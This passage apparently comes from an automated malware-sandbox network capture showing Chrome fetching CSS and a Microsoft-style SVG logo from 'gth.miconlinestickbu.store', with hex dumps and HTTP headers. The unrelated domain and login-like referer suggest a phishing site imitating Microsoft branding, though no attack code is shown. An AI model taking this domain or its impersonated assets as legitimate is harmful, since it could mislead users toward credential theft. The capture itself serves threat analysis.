                                    2024-05-22 15:09:26 UTC1369INData Raw: 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 74 68 69 6e 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 69 6d 67 2d 72 65 73 70 6f 6e
                                    Data Ascii: ox;box-sizing:border-box}input,button,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a:focus{outline:thin dotted;outline-offset:-2px;outline:5px auto -webkit-focus-ring-color}figure{margin:0}img{vertical-align:middle}.img-respon
                                    2024-05-22 15:09:26 UTC1369INData Raw: 6f 72 3a 23 39 39 39 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 6a 75 73 74 69 66 79 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 7d 2e 74 65 78 74 2d 6e 6f 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 74 65 78 74 2d 6c 6f 77 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 75 70 70 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 74 65 78 74 2d 63 61 70 69 74 61 6c 69 7a 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 7d 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d
                                    Data Ascii: or:#999}.text-center{text-align:center}.text-justify{text-align:justify}.text-nowrap{white-space:nowrap}.text-lowercase{text-transform:lowercase}.text-uppercase{text-transform:uppercase}.text-capitalize{text-transform:capitalize}ul,ol{margin-top:0;margin-
                                    2024-05-22 15:09:26 UTC1369INData Raw: 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 36 70 78 3b 66
                                    Data Ascii: xlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.text-maxlines-4{max-height:324.5432px;max-height:20.28395rem}.text-header,h1{font-size:46px;line-height:56px;f
                                    2024-05-22 15:09:26 UTC1369INData Raw: 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 2e 37 32 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 30 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74
                                    Data Ascii: -height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:32.7264px;max-height:2.0454rem}.text-title.t
                                    2024-05-22 15:09:26 UTC1369INData Raw: 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 38 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 36 34 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70
                                    Data Ascii: -2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.text-caption.text-maxlines-4,h5.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.text-cap
                                    2024-05-22 15:09:26 UTC1369INData Raw: 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 2e 34 35 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 32 37 38 33 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a
                                    Data Ascii: .9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.text-body.text-maxlines-2,p.text-maxlines-2{max-height:
                                    2024-05-22 15:09:26 UTC1369INData Raw: 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 70 78 3b 77 69 64 74 68 3a 39 30 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 2c 2e 63 6f 6e 74 61 69 6e 65 72 3a 61 66 74 65 72 2c 2e 63
                                    Data Ascii: e-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-right:auto;margin-left:auto;padding-left:2px;padding-right:2px;width:90%}.container:before,.container:after,.c
                                    2024-05-22 15:09:26 UTC955INData Raw: 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 6d 64 2d 32 33 2c 2e 63 6f 6c 2d 6c 67 2d 32 33 2c 2e 63 6f 6c 2d 78 73 2d 32 34 2c 2e 63 6f 6c 2d 73 6d 2d 32 34 2c 2e 63 6f 6c 2d 6d 64 2d 32 34 2c 2e 63 6f 6c 2d 6c 67 2d 32 34 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 70 78 3b 70 61 64 64 69
                                    Data Ascii: 0,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.col-lg-23,.col-xs-24,.col-sm-24,.col-md-24,.col-lg-24{position:relative;min-height:1px;padding-left:2px;paddi


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    38192.168.2.449809104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC1225OUTGET /o/617b5a702a34daddd03071650f95cbe6664e0aa557579 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:26 UTC648INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:26 GMT
                                    Content-Type: image/svg+xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Vary: Accept-Encoding
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysJEMAgqaRNpQ0kFqHjP0PXgYbHSZ1RmgwDogWzp9G5xLsTTdp7eF8n0BAg2EFnfEQvRmVdVl1AhwMnhY2%2FU3dMoJpYi%2BBlGexIWO7JI8CuhLiRhVWaFc9BtiPFj7UMaFBOpBBEUZDIjqXtyUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba2e3c800f95-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:26 UTC721INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                    Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                    2024-05-22 15:09:26 UTC1369INData Raw: 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e
                                    Data Ascii: 4.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.
                                    2024-05-22 15:09:26 UTC1369INData Raw: 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38 35 2e 32 37 38 2c 31 33 2e 36 41 35 2e 33 35
                                    Data Ascii: ,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.35
                                    2024-05-22 15:09:26 UTC199INData Raw: 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                    Data Ascii: 069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                    2024-05-22 15:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    39192.168.2.449808104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:26 UTC1195OUTGET /ASSETS/img/m_.svg HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; PHPSESSID=40526b412e3f7a3670e1fffe72385dfd
                                    2024-05-22 15:09:26 UTC679INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:26 GMT
                                    Content-Type: image/svg+xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Last-Modified: Tue, 14 May 2024 10:31:22 GMT
                                    Vary: Accept-Encoding
                                    Cache-Control: max-age=14400
                                    CF-Cache-Status: MISS
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BVN5SP8CahBk7F9By73byDZMV1efV%2FlsXEEnSdAQJuqPCRY38ZQCk2mv7vqXALzpq1AYk%2BiwGVmnbDTqUmF38PugC1RMiF9b4nhzjqv5PvJlOO9OXw054U8PvEoJTDWs7B%2FPon8WPfFfnZkkAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba2e7adf8ce0-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:26 UTC690INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                    Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                    2024-05-22 15:09:26 UTC1369INData Raw: 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39
                                    Data Ascii: 55-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.9
                                    2024-05-22 15:09:26 UTC1369INData Raw: 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c
                                    Data Ascii: 4,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,
